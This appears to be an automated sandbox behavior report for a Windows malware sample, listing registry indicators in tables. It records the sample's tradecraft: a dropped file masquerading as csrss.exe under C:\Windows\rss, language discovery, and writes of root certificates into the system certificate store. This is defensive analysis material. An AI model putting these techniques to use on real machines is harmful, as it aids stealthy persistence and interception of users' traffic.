System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-891 = "Morocco Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-421 = "Russian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-581 = "North Asia East Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-521 = "N. Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\rss\csrss.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a441400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b82000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Windows\rss\csrss.exe | N/A |
